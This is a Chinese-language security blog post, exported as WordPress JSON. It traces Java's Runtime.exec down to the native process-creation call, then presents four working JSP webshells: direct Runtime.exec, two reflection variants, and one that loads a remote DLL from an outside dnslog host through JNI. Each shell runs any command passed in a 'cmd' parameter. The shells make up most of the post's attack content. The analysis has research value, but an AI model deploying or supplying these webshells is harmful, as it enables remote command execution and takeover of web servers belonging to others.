{"id":248,"date":"2022-02-20T10:37:24","date_gmt":"2022-02-20T02:37:24","guid":{"rendered":"https:\/\/aaaahui.top\/?p=248"},"modified":"2022-08-13T21:26:14","modified_gmt":"2022-08-13T13:26:14","slug":"jsp-webshell","status":"publish","type":"post","link":"https:\/\/ahui.blog\/index.php\/2022\/02\/20\/jsp-webshell\/","title":{"rendered":"\u8ddf\u8e2aRuntime\u7c7bexec\u65b9\u6cd5\u7684\u5e95\u5c42\u5b9e\u73b0\u5230JSP WEBSHELL\u7684\u51e0\u79cd\u5b9e\u73b0\u5f62\u5f0f"},"content":{"rendered":"<p><strong>jspwebshell\u7684\u5b9e\u73b0\u5f62\u5f0f\u6709\u5f88\u591a\uff0c\u8fd9\u91cc\u53ea\u662f\u6839\u636eRuntime.exec\u65b9\u6cd5\u8054\u60f3\u5230\u7684\u51e0\u79cd\u5b9e\u73b0\uff0c\u540e\u9762\u7684\u6587\u7ae0\u4f1a\u8fdb\u884c\u5176\u4ed6\u65b9\u6cd5\u7684\u5b9e\u73b0\u3002<\/strong><br \/>\n\u9996\u5148\u8fd9\u662f\u6700\u57fa\u672c\u7684\u901a\u8fc7Runtime\u7c7b\u7684exec\u65b9\u6cd5\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-java\">&lt;%\n    String cmd = request.getParameter(&quot;cmd&quot;);\n    java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();\n    byte[] b = new byte[2048];\n    out.print(&quot;&lt;pre&gt;&quot;);\n    while(in.read(b)!=-1){\n        out.print(new String(b));\n    }\n    out.print(&quot;&lt;pre&gt;&quot;);\n%&gt;<\/code><\/pre>\n<p>\u7136\u540e\u662f\u901a\u8fc7\u53cd\u5c04Runtime\u7c7b\u6765\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-java\">&lt;%\n    String cmd = request.getParameter(&quot;cmd&quot;);\n    Class clazz = Class.forName(&quot;java.lang.Runtime&quot;);\n    java.lang.reflect.Constructor constructor = clazz.getDeclaredConstructor();\n    constructor.setAccessible(true);\n    Object runtime = constructor.newInstance();\n    java.lang.reflect.Method exec = clazz.getMethod(&quot;exec&quot;,String.class);\n    Process p = (Process)exec.invoke(runtime,cmd);\n    java.io.InputStream in = p.getInputStream();\n    byte[] b = new byte[2048];\n    out.print(&quot;&lt;pre&gt;&quot;);\n    while(in.read(b)!=-1){\n        out.print(new String(b);\n    }\n    out.print(&quot;&lt;\/pre&gt;&quot;);\n%&gt;<\/code><\/pre>\n<p>Runtime\u7c7b\u7684exec\u65b9\u6cd5\u7684\u5b9e\u73b0\uff0c\u8ddf\u4e00\u4e0b\uff1a<br \/>\n<img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219223707677.png\" alt=\"\" \/><\/p>\n<p>\u8ddf\u5230ProcessBuilder\u7c7b\u91cc\u9762\uff0c\u770bstart\u65b9\u6cd5\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224057498.png\" alt=\"image-20220219224057498\" \/><\/p>\n<p>start\u65b9\u6cd5\u91cc\u9762\u8fd4\u56de\u4e86ProcessImpl\u7684start\u65b9\u6cd5\u6267\u884c\u7684\u7ed3\u679c\uff0c\u8ddf\u8fdb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224236200.png\" alt=\"image-20220219224236200\" \/><\/p>\n<p>\u5728\u8fd9\u91cc\u521b\u5efa\u4e86\u4e00\u4e2aProcessImpl\u5b9e\u4f8b\uff0c\u8ddf\u8fdb\u4ed6\u7684\u6784\u9020\u65b9\u6cd5\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224404447.png\" alt=\"image-20220219224404447\" \/><\/p>\n<p>\u6784\u9020\u65b9\u6cd5\u6d41\u7a0b\u91cc\u9762\u6700\u7ec8\u8c03\u7528\u4e86create\u65b9\u6cd5\uff0c\u8ddf\u8fdb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224511767.png\" alt=\"image-20220219224511767\" \/><\/p>\n<p>\u8fd9\u4e2a\u65b9\u6cd5\u662f\u4f7f\u7528win32\u51fd\u6570CreateProcess\u521b\u5efa\u4e00\u4e2a\u8fdb\u7a0b\uff08\u6211\u4e5f\u662f\u5728\u6ce8\u91ca\u91cc\u627e\u5230\u7684\uff09<\/p>\n<p>\u73b0\u5728exec\u7684\u5e95\u5c42\u6267\u884c\u539f\u7406\u5df2\u7ecf\u641e\u660e\u767d\u4e86\uff0c\u6700\u7ec8\u662f\u4f7f\u7528JNI\uff08\u4e0d\u4e86\u89e3\u7684\u540c\u5b66\u81ea\u884c\u767e\u5ea6\uff09\u8c03\u7528WindowsAPI\u5b9e\u73b0\u7684\u547d\u4ee4\u6267\u884c\uff0cLinux\u4e0b\u4e5f\u540c\u7406\u3002<\/p>\n<p>\u4ecejava\u6267\u884c\u547d\u4ee4\u7684\u6d41\u7a0b\u80fd\u591f\u5206\u6790\u51fa\uff0c\u53ef\u4ee5\u4eceProcessBuilder\u5904\u5b9e\u73b0\u547d\u4ee4\u6267\u884c\u6784\u9020webshell\uff0c\u53ef\u4ee5\u4eceProcessImpl\u5904\u5b9e\u73b0\u547d\u4ee4\u6267\u884c\u6784\u9020webshell\uff0c\u4e5f\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528JNI\u5b9e\u73b0\u547d\u4ee4\u6267\u884c\u3002<\/p>\n<p>\u5c31\u5217\u51fa\u6765\u4e00\u4e2a\u4f8b\u5b50\u5427\uff0c\u53cd\u5c04\u8c03\u7528ProcessImpl\u7684webshell\uff1a<\/p>\n<pre><code class=\"language-java\">&lt;%\n    String[] cmd = {request.getParameter(&quot;cmd&quot;)};\n    long[] longs = new long[]{-1,-1,-1};\n    Class clazz = Class.forName(&quot;java.lang.ProcessImpl&quot;);\n    java.lang.reflect.Method method = clazz.getDeclaredMethod(&quot;start&quot;, String[].class, java.util.Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);\n    method.setAccessible(true); \n    Process p = (Process) method.invoke(null, cmd, null, &quot;.&quot;, null, true);\n    java.io.InputStream in = p.getInputStream();\n    byte[] b = new byte[2048];\n    out.print(&quot;&lt;pre&gt;&quot;);\n    while(in.read(b)!=-1){\n        out.print(new String(b));\n    }\n    out.print(&quot;&lt;pre&gt;&quot;);\n%&gt;<\/code><\/pre>\n<p>\u52a0\u8f7d\u8fdc\u7a0bdll\u4f7f\u7528JNI\u8c03\u7528\u547d\u4ee4\u6267\u884c\u65b9\u6cd5\u7684webshell\uff1a<\/p>\n<pre><code class=\"language-java\">&lt;%!\n    class JNI{\n        public native String exec(String str);\n    }\n%&gt;\n&lt;%\n    System.load(&quot;\\\\\\\\nprv9u.dnslog.cn\\\\exec.dll&quot;);\n    String cmd = request.getParameter(&quot;cmd&quot;);\n    JNI jni = new JNI();\n    String res = jni.exec(cmd);\n    out.println(res);\n%&gt;<\/code><\/pre>\n<p>\u4ee5\u4e0a\u5c31\u662f\u6839\u636eRuntime\u7684exec\u65b9\u6cd5\u6267\u884c\u547d\u4ee4\u8054\u60f3\u5230\u7684webshell\u7684\u51e0\u79cd\u5b9e\u73b0\u5f62\u5f0f\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>jspwebshell\u7684\u5b9e\u73b0\u5f62\u5f0f\u6709\u5f88\u591a\uff0c\u8fd9\u91cc\u53ea\u662f\u6839\u636eRuntime.exec\u65b9\u6cd5\u8054\u60f3\u5230\u7684\u51e0\u79cd\u5b9e\u73b0\uff0c\u540e\u9762\u7684\u6587\u7ae0\u4f1a &#8230; <a title=\"\u8ddf\u8e2aRuntime\u7c7bexec\u65b9\u6cd5\u7684\u5e95\u5c42\u5b9e\u73b0\u5230JSP WEBSHELL\u7684\u51e0\u79cd\u5b9e\u73b0\u5f62\u5f0f\" class=\"read-more\" href=\"https:\/\/ahui.blog\/index.php\/2022\/02\/20\/jsp-webshell\/\" aria-label=\"\u7ee7\u7eed\u9605\u8bfb\u8ddf\u8e2aRuntime\u7c7bexec\u65b9\u6cd5\u7684\u5e95\u5c42\u5b9e\u73b0\u5230JSP WEBSHELL\u7684\u51e0\u79cd\u5b9e\u73b0\u5f62\u5f0f\">\u9605\u8bfb\u66f4\u591a<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[17],"class_list":["post-248","post","type-post","status-publish","format-standard","hentry","category-safety_research","tag-java"],"_links":{"self":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/comments?post=248"}],"version-history":[{"count":1,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/248\/revisions"}],"predecessor-version":[{"id":255,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/248\/revisions\/255"}],"wp:attachment":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/media?parent=248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/categories?post=248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/tags?post=248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}